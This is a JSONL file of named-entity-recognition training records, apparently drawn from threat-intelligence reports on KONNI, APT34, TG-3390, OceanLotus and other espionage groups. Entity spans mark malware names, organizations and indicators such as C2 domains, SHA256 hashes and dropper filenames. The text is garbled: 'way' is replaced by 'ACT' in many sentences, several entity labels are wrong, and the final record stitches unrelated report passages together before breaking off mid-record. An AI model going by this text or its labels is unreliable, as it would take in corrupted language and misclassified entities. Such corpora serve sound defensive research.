{"text": "The executable performs the following tasks: If the system is a 64-bit version of Windows , it downloads and executes a specific 64-bit version of the malware thanks to a powershell script .", "spans": {"System: Windows": [[82, 89]], "System: powershell": [[171, 181]]}, "info": {"id": "aptner_train_003614", "source": "aptner_train"}}
{"text": "Loading the dropped library .", "spans": {}, "info": {"id": "aptner_train_003615", "source": "aptner_train"}}
{"text": "The library contains the same features as the previous version as well as new ones .", "spans": {}, "info": {"id": "aptner_train_003616", "source": "aptner_train"}}
{"text": "This version of KONNI is the most advanced with better coding .", "spans": {"Malware: KONNI": [[16, 21]]}, "info": {"id": "aptner_train_003617", "source": "aptner_train"}}
{"text": "The malware configuration contains one Command and Control: pactchfilepacks.net23.net .", "spans": {"Indicator: pactchfilepacks.net23.net": [[60, 85]]}, "info": {"id": "aptner_train_003618", "source": "aptner_train"}}
{"text": "A new URI is available: <c2-domain>/uploadtm.php .", "spans": {"Indicator: <c2-domain>/uploadtm.php": [[24, 48]]}, "info": {"id": "aptner_train_003619", "source": "aptner_train"}}
{"text": "This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL .", "spans": {}, "info": {"id": "aptner_train_003620", "source": "aptner_train"}}
{"text": "The malware checks if a file used on a previous version of KONNI is available on the system .", "spans": {"Malware: KONNI": [[59, 64]]}, "info": {"id": "aptner_train_003621", "source": "aptner_train"}}
{"text": "Here is the complete list of files internally used by the RAT: error.tmp (the log file of the keylogger) tedsul.ocx helpsol.ocx trepsl.ocx psltred.ocx solhelp.ocx sulted.ocx .", "spans": {"Indicator: error.tmp": [[63, 72]], "Indicator: tedsul.ocx": [[105, 115]], "Indicator: helpsol.ocx": [[116, 127]], "Indicator: trepsl.ocx": [[128, 138]], "Indicator: psltred.ocx": [[139, 150]], "Indicator: solhelp.ocx": [[151, 162]], "Indicator: sulted.ocx": [[163, 173]]}, "info": {"id": "aptner_train_003622", "source": "aptner_train"}}
{"text": "The handling of instructions has improved too .", "spans": {}, "info": {"id": "aptner_train_003623", "source": "aptner_train"}}
{"text": "Here are the 7 actions that the infected machine can be instructed to perform: Delete a specific file .", "spans": {}, "info": {"id": "aptner_train_003624", "source": "aptner_train"}}
{"text": "Upload a specific file based on a filename .", "spans": {}, "info": {"id": "aptner_train_003625", "source": "aptner_train"}}
{"text": "Upload a specific file based on the full path name .", "spans": {}, "info": {"id": "aptner_train_003626", "source": "aptner_train"}}
{"text": "Create a screenshot and uploads it on the C2 .", "spans": {"System: C2": [[42, 44]]}, "info": {"id": "aptner_train_003627", "source": "aptner_train"}}
{"text": "Download a file from the Internet .", "spans": {}, "info": {"id": "aptner_train_003629", "source": "aptner_train"}}
{"text": "Execute a command .", "spans": {}, "info": {"id": "aptner_train_003630", "source": "aptner_train"}}
{"text": "When the attacker wants to gather information on the infected system (action 5) , it retrieves the following information: Hostname IP address Computer name Username name Connected drive OS version Architecture Start menu programs Installed software .", "spans": {}, "info": {"id": "aptner_train_003631", "source": "aptner_train"}}
{"text": "The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr .", "spans": {"Malware: KONNI": [[35, 40]], "Indicator: RC_Office_Coordination_Associate.scr": [[105, 141]]}, "info": {"id": "aptner_train_003632", "source": "aptner_train"}}
{"text": "This file drops exactly the same files than the previous campaign but the decoy document is different .", "spans": {}, "info": {"id": "aptner_train_003633", "source": "aptner_train"}}
{"text": "This document contains the name , phone number and email address of members of agencies , embassies and organizations linked to North Korea .", "spans": {"System: email": [[51, 56]]}, "info": {"id": "aptner_train_003634", "source": "aptner_train"}}
{"text": "The analysis shows us the evolution of KONNI over the last 3 years .", "spans": {"Malware: KONNI": [[39, 44]]}, "info": {"id": "aptner_train_003635", "source": "aptner_train"}}
{"text": "The last campaign was started a few days ago and is still active .", "spans": {}, "info": {"id": "aptner_train_003636", "source": "aptner_train"}}
{"text": "The infrastructure remains up and running at the time of this post .", "spans": {}, "info": {"id": "aptner_train_003637", "source": "aptner_train"}}
{"text": "The RAT has remained under the Radar for multiple years .", "spans": {"System: Radar": [[31, 36]]}, "info": {"id": "aptner_train_003638", "source": "aptner_train"}}
{"text": "An explanation could be the fact that the campaign was very limited nature , which does not arouse suspicion .", "spans": {}, "info": {"id": "aptner_train_003639", "source": "aptner_train"}}
{"text": "This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents .", "spans": {}, "info": {"id": "aptner_train_003640", "source": "aptner_train"}}
{"text": "The campaign of April 2017 used pertinent documents containing potentially sensitive data .", "spans": {}, "info": {"id": "aptner_train_003641", "source": "aptner_train"}}
{"text": "Moreover the metadata of the Office document contains the names of people who seems to work for a public organization .", "spans": {"System: Office": [[29, 35]]}, "info": {"id": "aptner_train_003642", "source": "aptner_train"}}
{"text": "We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible .", "spans": {}, "info": {"id": "aptner_train_003643", "source": "aptner_train"}}
{"text": "Clearly the author has a real interest in North Korea , with 3 of the 4 campaigns are linked to North Korea .", "spans": {}, "info": {"id": "aptner_train_003644", "source": "aptner_train"}}
{"text": "Additional ways our customers can detect and block this threat are listed below .", "spans": {}, "info": {"id": "aptner_train_003645", "source": "aptner_train"}}
{"text": "CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": {"System: CWS": [[0, 3]], "System: WSA": [[7, 10]]}, "info": {"id": "aptner_train_003647", "source": "aptner_train"}}
{"text": "The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors .", "spans": {"Organization: Network Security": [[4, 20]], "System: IPS": [[35, 38]], "System: NGFW": [[43, 47]]}, "info": {"id": "aptner_train_003649", "source": "aptner_train"}}
{"text": "Umbrella , our secure internet gateway (SIG) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network .", "spans": {"Organization: Umbrella": [[0, 8]]}, "info": {"id": "aptner_train_003651", "source": "aptner_train"}}
{"text": "SHA256 : 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f .", "spans": {"Indicator: 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f": [[9, 73]]}, "info": {"id": "aptner_train_003652", "source": "aptner_train"}}
{"text": "Filename: beauty.scr .", "spans": {"Indicator: beauty.scr": [[10, 20]]}, "info": {"id": "aptner_train_003653", "source": "aptner_train"}}
{"text": "SHA256 : eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 .", "spans": {"Indicator: eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435": [[9, 73]]}, "info": {"id": "aptner_train_003654", "source": "aptner_train"}}
{"text": "Filename: C:\\Windows\\beauty.jpg .", "spans": {"Indicator: C:\\Windows\\beauty.jpg": [[10, 31]]}, "info": {"id": "aptner_train_003655", "source": "aptner_train"}}
{"text": "File type: JPEG image data , JFIF standard 1.02 .", "spans": {}, "info": {"id": "aptner_train_003656", "source": "aptner_train"}}
{"text": "SHA256 : 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9 .", "spans": {"Indicator: 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9": [[9, 73]]}, "info": {"id": "aptner_train_003657", "source": "aptner_train"}}
{"text": "Hilename: C:\\Windows\\svchost.exe .", "spans": {"Indicator: C:\\Windows\\svchost.exe": [[10, 32]]}, "info": {"id": "aptner_train_003658", "source": "aptner_train"}}
{"text": "File type: PE32 executable (GUI) Intel 80386 , for MS Windows .", "spans": {"Organization: MS Windows": [[51, 61]]}, "info": {"id": "aptner_train_003659", "source": "aptner_train"}}
{"text": "phpschboy.prohosts.org .", "spans": {"Indicator: phpschboy.prohosts.org": [[0, 22]]}, "info": {"id": "aptner_train_003660", "source": "aptner_train"}}
{"text": "jams481.site.bz .", "spans": {"Indicator: jams481.site.bz": [[0, 15]]}, "info": {"id": "aptner_train_003661", "source": "aptner_train"}}
{"text": "SHA256 : 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 .", "spans": {"Indicator: 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5": [[9, 73]]}, "info": {"id": "aptner_train_003662", "source": "aptner_train"}}
{"text": "Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr .", "spans": {"Indicator: How can North Korean hydrogen bomb wipe out Manhattan.scr": [[10, 67]]}, "info": {"id": "aptner_train_003663", "source": "aptner_train"}}
{"text": "SHA256 : 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 .", "spans": {"Indicator: 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634": [[9, 73]]}, "info": {"id": "aptner_train_003664", "source": "aptner_train"}}
{"text": "Filename: conhote.dll .", "spans": {"Indicator: conhote.dll": [[10, 21]]}, "info": {"id": "aptner_train_003665", "source": "aptner_train"}}
{"text": "SHA256 : 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc .", "spans": {"Indicator: 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc": [[9, 73]]}, "info": {"id": "aptner_train_003666", "source": "aptner_train"}}
{"text": "Filename: winnit.exe .", "spans": {"Indicator: winnit.exe": [[10, 20]]}, "info": {"id": "aptner_train_003667", "source": "aptner_train"}}
{"text": "SHA256 : 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f .", "spans": {"Indicator: 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f": [[9, 73]]}, "info": {"id": "aptner_train_003668", "source": "aptner_train"}}
{"text": "Filename: Anti virus service.lnk . dowhelsitjs.netau.net .", "spans": {"Indicator: Anti virus service.lnk": [[10, 32]], "Indicator: dowhelsitjs.netau.net": [[35, 56]]}, "info": {"id": "aptner_train_003669", "source": "aptner_train"}}
{"text": "SHA256 : 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 .", "spans": {"Indicator: 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0": [[9, 73]]}, "info": {"id": "aptner_train_003670", "source": "aptner_train"}}
{"text": "Filename: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr .", "spans": {"Indicator: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr": [[10, 89]]}, "info": {"id": "aptner_train_003671", "source": "aptner_train"}}
{"text": "SHA256 : 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b .", "spans": {"Indicator: 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b": [[9, 73]]}, "info": {"id": "aptner_train_003672", "source": "aptner_train"}}
{"text": "Filename: adobe distillist.lnk .", "spans": {"Indicator: adobe distillist.lnk": [[10, 30]]}, "info": {"id": "aptner_train_003673", "source": "aptner_train"}}
{"text": "SHA256 : 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 .", "spans": {"Indicator: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635": [[9, 73]]}, "info": {"id": "aptner_train_003674", "source": "aptner_train"}}
{"text": "Filename: winload.exe .", "spans": {"Indicator: winload.exe": [[10, 21]]}, "info": {"id": "aptner_train_003675", "source": "aptner_train"}}
{"text": "SHA256 : dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d .", "spans": {"Indicator: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d": [[9, 73]]}, "info": {"id": "aptner_train_003676", "source": "aptner_train"}}
{"text": "Filename: winload.dll .", "spans": {"Indicator: winload.dll": [[10, 21]]}, "info": {"id": "aptner_train_003677", "source": "aptner_train"}}
{"text": "Pactchfilepacks.net23.net . checkmail.phpnet.us .", "spans": {"Indicator: Pactchfilepacks.net23.net": [[0, 25]], "Indicator: checkmail.phpnet.us": [[28, 47]]}, "info": {"id": "aptner_train_003678", "source": "aptner_train"}}
{"text": "Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Indicator: Documents": [[0, 9]], "System: flash": [[19, 24]], "Vulnerability: exploit": [[25, 32], [94, 101]], "System: VirusTotal": [[105, 115]]}, "info": {"id": "aptner_train_003692", "source": "aptner_train"}}
{"text": "Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts .", "spans": {"Organization: Leafminer": [[0, 9]]}, "info": {"id": "aptner_train_003754", "source": "aptner_train"}}
{"text": "The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"Vulnerability: EternalBlue": [[4, 15]], "Vulnerability: exploits": [[16, 24]], "Malware: Petya": [[138, 143]], "Malware: NotPetya": [[146, 154]]}, "info": {"id": "aptner_train_003765", "source": "aptner_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"Indicator: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]]}, "info": {"id": "aptner_train_003786", "source": "aptner_train"}}
{"text": "The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy .", "spans": {"Organization: Leviathan": [[4, 13]], "Organization: universities": [[86, 98]], "Organization: military": [[104, 112]], "Organization: Navy": [[156, 160]]}, "info": {"id": "aptner_train_003794", "source": "aptner_train"}}
{"text": "FireEye is highlighting a Cyber Espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: actor": [[155, 160]], "Organization: APT40": [[169, 174]]}, "info": {"id": "aptner_train_003801", "source": "aptner_train"}}
{"text": "We assess with moderate confidence that APT40 is a state-sponsored Chinese Cyber Espionage operation .", "spans": {"Organization: APT40": [[40, 45]]}, "info": {"id": "aptner_train_003806", "source": "aptner_train"}}
{"text": "Depending on placement , a Web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement .", "spans": {"System: Web shell": [[27, 36]]}, "info": {"id": "aptner_train_003811", "source": "aptner_train"}}
{"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: actors": [[31, 37]], "Organization: individual": [[72, 82]]}, "info": {"id": "aptner_train_003829", "source": "aptner_train"}}
{"text": "These emails included recruitment-themed lures and links to malicious HTML Application files .", "spans": {"System: emails": [[6, 12]], "System: HTML Application": [[70, 86]]}, "info": {"id": "aptner_train_003895", "source": "aptner_train"}}
{"text": "APT34 often uses compromised accounts to conduct spear-phishing operations .", "spans": {"Organization: APT34": [[0, 5]], "Malware: compromised accounts": [[17, 37]]}, "info": {"id": "aptner_train_003898", "source": "aptner_train"}}
{"text": "Magic Hound will often find simpler ACTs for effective compromise , such as creative phishing and simple custom malware .", "spans": {}, "info": {"id": "aptner_train_003953", "source": "aptner_train"}}
{"text": "Attackers can point and click their ACT through a compromised network and exfiltrate data .", "spans": {"Organization: Attackers": [[0, 9]]}, "info": {"id": "aptner_train_003982", "source": "aptner_train"}}
{"text": "The threat actor 's known working hours align to Chinese Standard TIME ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": {"Organization: actors": [[151, 157]], "Organization: APT10": [[228, 233]]}, "info": {"id": "aptner_train_004031", "source": "aptner_train"}}
{"text": "Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit MAL ( HTRAN ) – to disguise their geographical locations .", "spans": {"Organization: Moafee": [[0, 6]], "Organization: DragonOK": [[11, 19]], "Malware: HUC Packet Transmit MAL": [[55, 78]], "Malware: HTRAN": [[81, 86]]}, "info": {"id": "aptner_train_004036", "source": "aptner_train"}}
{"text": "We believe APT34 is involved in a long-term Cyber Espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": {"Organization: APT34": [[11, 16]]}, "info": {"id": "aptner_train_004214", "source": "aptner_train"}}
{"text": "APT34 uses a mix of public and non-public tools and often uses compromised accounts to conduct spear-phishing operations .", "spans": {"Organization: APT34": [[0, 5]]}, "info": {"id": "aptner_train_004261", "source": "aptner_train"}}
{"text": "Russia .", "spans": {}, "info": {"id": "aptner_train_004319", "source": "aptner_train"}}
{"text": "While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": {"Malware: custom dropper": [[35, 49]]}, "info": {"id": "aptner_train_004359", "source": "aptner_train"}}
{"text": "While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": {"Malware: hacktools": [[54, 63]]}, "info": {"id": "aptner_train_004360", "source": "aptner_train"}}
{"text": "Of note , this methodology of naming abstracts aACT the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"Organization: XENOTIME": [[74, 82]], "Organization: research institution": [[142, 162]]}, "info": {"id": "aptner_train_004424", "source": "aptner_train"}}
{"text": "CTU researchers have evidence that the TG-3390 compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"Organization: CTU": [[0, 3]], "Organization: TG-3390": [[39, 46]], "Organization: manufacturing": [[114, 127]], "Organization: aerospace": [[143, 152]], "Organization: defense contractors": [[165, 184]], "Organization: automotive": [[189, 199]], "Organization: technology": [[202, 212]], "Organization: energy": [[215, 221]], "Organization: pharmaceuticals": [[228, 243]], "Organization: education": [[248, 257]], "Organization: legal": [[264, 269]]}, "info": {"id": "aptner_train_004431", "source": "aptner_train"}}
{"text": "Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": {"Malware: Malware": [[0, 7]]}, "info": {"id": "aptner_train_004446", "source": "aptner_train"}}
{"text": "In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": {"Malware: SWCs": [[21, 25]], "Organization: TG-3390": [[70, 77]], "System: emails": [[97, 103]]}, "info": {"id": "aptner_train_004448", "source": "aptner_train"}}
{"text": "Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"System: C2": [[19, 21]], "Organization: TG-3390": [[77, 84]]}, "info": {"id": "aptner_train_004456", "source": "aptner_train"}}
{"text": "CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) .", "spans": {"Organization: CTU": [[0, 3]]}, "info": {"id": "aptner_train_004460", "source": "aptner_train"}}
{"text": "TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": {"Organization: TG-3390": [[0, 7]], "System: DLL": [[141, 144]]}, "info": {"id": "aptner_train_004467", "source": "aptner_train"}}
{"text": "They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": {"Malware: OwaAuth web shell": [[66, 83]]}, "info": {"id": "aptner_train_004475", "source": "aptner_train"}}
{"text": "Emissary Panda has used many ACTs with the most notable being the exploits from the Hacking Team leak .", "spans": {}, "info": {"id": "aptner_train_004518", "source": "aptner_train"}}
{"text": "Taiwan has been a regular target of Cyber Espionage threat actors for a number of years .", "spans": {}, "info": {"id": "aptner_train_004574", "source": "aptner_train"}}
{"text": "The China-backed Barium APT is suspected to be at the helm of the project .", "spans": {"Organization: Barium": [[17, 23]]}, "info": {"id": "aptner_train_004769", "source": "aptner_train"}}
{"text": "targeted attacks .", "spans": {}, "info": {"id": "aptner_train_004842", "source": "aptner_train"}}
{"text": "The developers of Bookworm use these modules in a rather unique ACT , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": {"Malware: Bookworm": [[18, 26]], "Malware: Leader": [[123, 129]]}, "info": {"id": "aptner_train_004851", "source": "aptner_train"}}
{"text": "We believe that the IP addresses from Canada , Russia and NorACT are analysis systems of antivirus companies or security researchers .", "spans": {"Organization: antivirus companies": [[89, 108]]}, "info": {"id": "aptner_train_004870", "source": "aptner_train"}}
{"text": "They have different functions and ACTs of spreading , but the same purpose — to steal money from the accounts of businesses .", "spans": {"Organization: businesses": [[113, 123]]}, "info": {"id": "aptner_train_004895", "source": "aptner_train"}}
{"text": "Periodically , the malware tries to contact the command-and-control ( C&C ) server with the username encoded into parameters .", "spans": {"System: command-and-control": [[48, 67]], "System: C&C": [[70, 73]]}, "info": {"id": "aptner_train_004952", "source": "aptner_train"}}
{"text": "Patchwork uses email as an entry point , which is why securing the email gateACT is important .", "spans": {"Organization: Patchwork": [[0, 9]]}, "info": {"id": "aptner_train_004959", "source": "aptner_train"}}
{"text": "Talos reported that these DNS hijacks also paved the ACT for the attackers to obtain SSL encryption certificates for the targeted domains ( webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text .", "spans": {"Organization: Talos": [[0, 5]], "Indicator: webmail.finance.gov.lb": [[140, 162]], "System: email": [[213, 218]], "System: VPN": [[223, 226]]}, "info": {"id": "aptner_train_005023", "source": "aptner_train"}}
{"text": "Kessem .", "spans": {"Organization: Kessem": [[0, 6]]}, "info": {"id": "aptner_train_005068", "source": "aptner_train"}}
{"text": "attacks using this tool were still active as of April 2016 .", "spans": {}, "info": {"id": "aptner_train_005103", "source": "aptner_train"}}
{"text": "Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": {"Malware: Win32/Barlaiy": [[37, 50]], "System: C&C": [[161, 164]]}, "info": {"id": "aptner_train_005156", "source": "aptner_train"}}
{"text": "LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"Organization: Barium": [[9, 15]], "Organization: SOC personnel": [[86, 99]]}, "info": {"id": "aptner_train_005166", "source": "aptner_train"}}
{"text": "Lurk uses a form of steganography : that's where one file is hidden aACT inside another file of a completely different sort , such as an image , audio , or video file .", "spans": {"Malware: Lurk": [[0, 4]]}, "info": {"id": "aptner_train_005183", "source": "aptner_train"}}
{"text": "\" With our latest research we now see how Greenbug has shifted aACT from HTTP-based C2 communication with Ismdoor .", "spans": {"System: C2": [[84, 86]], "Malware: Ismdoor": [[106, 113]]}, "info": {"id": "aptner_train_005242", "source": "aptner_train"}}
{"text": "com to establish free subdomains in their infrastructure .", "spans": {}, "info": {"id": "aptner_train_005267", "source": "aptner_train"}}
{"text": "In the second set they are making use of a dynamic DNS service by ChangeIP .", "spans": {"Malware: dynamic DNS service": [[43, 62]]}, "info": {"id": "aptner_train_005275", "source": "aptner_train"}}
{"text": "com .", "spans": {}, "info": {"id": "aptner_train_005276", "source": "aptner_train"}}
{"text": "Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"Indicator: attachment": [[35, 45]], "Malware: Trojan": [[63, 69]], "Malware: NetTraveler": [[79, 90]], "Indicator: DLL side-loading": [[99, 115]]}, "info": {"id": "aptner_train_005356", "source": "aptner_train"}}
{"text": "attacks on the chemical industry are merely their latest attack wave .", "spans": {"Organization: chemical industry": [[15, 32]]}, "info": {"id": "aptner_train_005374", "source": "aptner_train"}}
{"text": "Like BlackEnergy ( a.k.a. Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": {"Malware: BlackEnergy": [[5, 16]], "Organization: Sandworm": [[26, 34]], "Organization: Quedagh": [[37, 44]], "Malware: Potao": [[49, 54]]}, "info": {"id": "aptner_train_005404", "source": "aptner_train"}}
{"text": "The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {"Organization: ScarCruft": [[4, 13]]}, "info": {"id": "aptner_train_005456", "source": "aptner_train"}}
{"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"Vulnerability: zero-day": [[39, 47]], "System: Adobe Flash Player": [[48, 66]]}, "info": {"id": "aptner_train_005464", "source": "aptner_train"}}
{"text": "attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": {"System: emails": [[34, 40]], "Vulnerability: exploit": [[85, 92]], "Organization: ScarCruft": [[113, 122]]}, "info": {"id": "aptner_train_005474", "source": "aptner_train"}}
{"text": "Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"System: flash": [[65, 70]], "Vulnerability: exploit": [[71, 78]], "Vulnerability: CVE-2016-4117": [[81, 94]]}, "info": {"id": "aptner_train_005475", "source": "aptner_train"}}
{"text": "Silence try to apply new techniques and ACTs of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": {}, "info": {"id": "aptner_train_005494", "source": "aptner_train"}}
{"text": "The spear-phishing infection vector is still the most popular ACT to initiate targeted campaigns .", "spans": {}, "info": {"id": "aptner_train_005506", "source": "aptner_train"}}
{"text": "The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools EternalRomance and EternalSynergy that were also released as part of the Shadow Brokers leak .", "spans": {"System: Windows": [[11, 18]], "Vulnerability: CVE-2017-0143": [[35, 48]], "Vulnerability: exploit": [[126, 133]], "Vulnerability: EternalRomance": [[140, 154]], "Vulnerability: EternalSynergy": [[159, 173]], "Organization: Shadow Brokers": [[213, 227]]}, "info": {"id": "aptner_train_005555", "source": "aptner_train"}}
{"text": "RedDrip Team (formerly SkyEye Team ) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . COCCOC is a Vietnam was founded in 2013 . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . these threat actors targeted a number of government agencies threat actors targeted a number of government agencies in East Asia . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 . specifically CVE-2018-0798 , before downloading subsequent payloads . The dropped PE file has the distinctive file name 8.t” . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . These conflicts have even resulted in Haftar leading an attack on the capital city in April . The attackers have targeted a large number of organizations globally since early 2017 . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . The attackers have taken great care to stay under the radar , imitating another attack group in the region . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . The malware starts communicating with the C&C server by sending basic information about the infected machine . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar . It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . In the course of this email correspondence , the attacker — Safeena” — then sent what appeared to be invitations to access several documents on Google Drive . The attackers were meticulous in making their phishing page as credible as possible . Among the targets of this campaign is the International Trade Union Confederation .", "spans": {"Organization: RedDrip Team": [[0, 12]], "Organization: SkyEye Team": [[23, 34]], "Organization: OceanLotus": [[49, 59], [331, 341], [447, 457]], "Organization: RedDrip": [[203, 210]], "Organization: COCCOC": [[344, 350]], "Organization: media": [[585, 590]], "Organization: real estate companies": [[593, 614]], "Organization: foreign enterprises": [[617, 636]], "Organization: banks": [[641, 646]], "Organization: Ratsnif": [[677, 684]], "Organization: actors": [[794, 800], [2379, 2385]], "Organization: government": [[822, 832]], "Organization: agencies": [[833, 841]], "Organization: Attackers": [[857, 866], [1512, 1521]], "Organization: Microsoft": [[877, 886]], "Vulnerability: exploit": [[903, 910]], "Vulnerability: CVE-2018-0798": [[911, 924], [1085, 1098]], "Organization: Maudi": [[1003, 1008]], "Malware: PE": [[1154, 1156]], "Indicator: 8.t”": [[1192, 1196]], "Organization: Cotx RAT": [[1263, 1271]], "Organization: Symantec": [[1300, 1308]], "Organization: Haftar": [[1368, 1374]], "Organization: attackers": [[1428, 1437], [2205, 2214], [2837, 2846], [3764, 3773], [4123, 4132]], "Organization: political": [[1600, 1609]], "Organization: Group's": [[1639, 1646]], "Organization: parliaments": [[1693, 1704]], "Organization: senates": [[1707, 1714]], "Organization: top state offices": [[1717, 1734]], "Organization: officials": [[1739, 1748]], "Organization: political science scholars": [[1751, 1777]], "Organization: military": [[1780, 1788]], "Organization: intelligence agencies": [[1793, 1814]], "Organization: ministries": [[1817, 